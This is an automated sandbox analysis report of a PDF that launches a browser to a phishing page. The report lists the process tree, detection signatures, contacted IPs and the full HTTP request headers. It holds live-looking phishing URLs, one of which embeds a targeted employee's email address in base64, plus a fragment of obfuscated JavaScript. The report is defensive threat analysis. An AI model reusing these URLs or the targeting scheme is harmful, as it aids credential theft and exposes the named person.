Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
renier_visser-In Employee -11384.pdf

Overview

General Information

Sample name:renier_visser-In Employee -11384.pdf
Analysis ID:1544002
MD5:b9b7622f7edd3df720b6eaebfd052d57
SHA1:4b2167d771081fb7285d32b9295b880da494e302
SHA256:c7a81145234d307ab53214ae9fb2cf87e855f0ce7d948fe3eb05481bf638fa8d
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious URL
HTML page contains obfuscated javascript
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 4396 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\renier_visser-In Employee -11384.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6872 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 1536 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2252 --field-trial-handle=1568,i,8438002774993098221,9784074526197564620,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 6680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://img2.leadong-edm.com/c/kdApfqMvoKJU/QLAfUpKvNfga/qpUKqIgnAGdz/jqAKUVFYiwcH?U=https://Vokbz-iamgold.mobile-pdfqronline.com/11384/#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2004,i,2892950466930992625,14663560579764141364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://vokbz-iamgold.mobile-pdfqronline.com/11384/#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ==HTTP Parser: function _0x8d2f(_0x2537a1,_0x3067ba){var _0x153fef=_0x153f();return _0x8d2f=function(_0x8d2f21,_0x
Source: https://vokbz-iamgold.mobile-pdfqronline.com/11384/?__cf_chl_rt_tk=RfTckejA3IsTnmGx2hMxZW0at9qomI1KvAylxSBhkEw-1730134052-1.0.1.1-oWnDs99zxb7jkIe_.4yR5kObhB4Q3c5Vmnk_QRJ_VXc#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ==HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
Source: https://vokbz-iamgold.mobile-pdfqronline.com/11384/?__cf_chl_rt_tk=RfTckejA3IsTnmGx2hMxZW0at9qomI1KvAylxSBhkEw-1730134052-1.0.1.1-oWnDs99zxb7jkIe_.4yR5kObhB4Q3c5Vmnk_QRJ_VXc#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ==HTTP Parser: No favicon
Source: https://vokbz-iamgold.mobile-pdfqronline.com/11384/#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ==HTTP Parser: No favicon
Source: https://vokbz-iamgold.mobile-pdfqronline.com/11384/#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ==HTTP Parser: No favicon
Source: https://vokbz-iamgold.mobile-pdfqronline.com/11384/#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ==HTTP Parser: No favicon
Source: https://8sq.w2agn.com/B9Z64HC_oJbkvSmVBaQzfkiG7YNd-0Po/#xrenier_visser@iamgold.comHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49778 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: global trafficHTTP traffic detected: GET /11384/ HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /11384/ HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d9c6884aac83168 HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/?__cf_chl_rt_tk=RfTckejA3IsTnmGx2hMxZW0at9qomI1KvAylxSBhkEw-1730134052-1.0.1.1-oWnDs99zxb7jkIe_.4yR5kObhB4Q3c5Vmnk_QRJ_VXcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d9c6884aac83168 HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vokbz-iamgold.mobile-pdfqronline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/244223768:1730132189:NbzFRZvTcBmmYjVsO5xy0JykfjjXCxNv2Vd8K9KmlQk/8d9c6884aac83168/.dA4utKOCXqNXZ7ka1Dy8Dmaet_UVdAWtZsXKlq57e4-1730134052-1.2.1.1-YB_bFKSHTRqrgWaOlj1EXOYaZKAO68GetFMt5G0UvZHFFnkZOi74rI0vPm2dKjee HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=612cNYgATxTDloo&MD=Z6lemAgC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c68ac0f68e79a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c68ac0f68e79a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d9c68ac0f68e79a/1730134061652/A1f9igYSRdqhedP HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d9c68ac0f68e79a/1730134061652/A1f9igYSRdqhedP HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d9c68ac0f68e79a/1730134061655/15b749dc2006a6f50d892c6ab83b60816ce2a1a6e467e4003a87b35d076d3cae/nYbxm4w-JBYgJQx HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/244223768:1730132189:NbzFRZvTcBmmYjVsO5xy0JykfjjXCxNv2Vd8K9KmlQk/8d9c6884aac83168/.dA4utKOCXqNXZ7ka1Dy8Dmaet_UVdAWtZsXKlq57e4-1730134052-1.2.1.1-YB_bFKSHTRqrgWaOlj1EXOYaZKAO68GetFMt5G0UvZHFFnkZOi74rI0vPm2dKjee HTTP/1.1Host: vokbz-iamgold.mobile-pdfqronline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vokbz-iamgold.mobile-pdfqronline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vokbz-iamgold.mobile-pdfqronline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
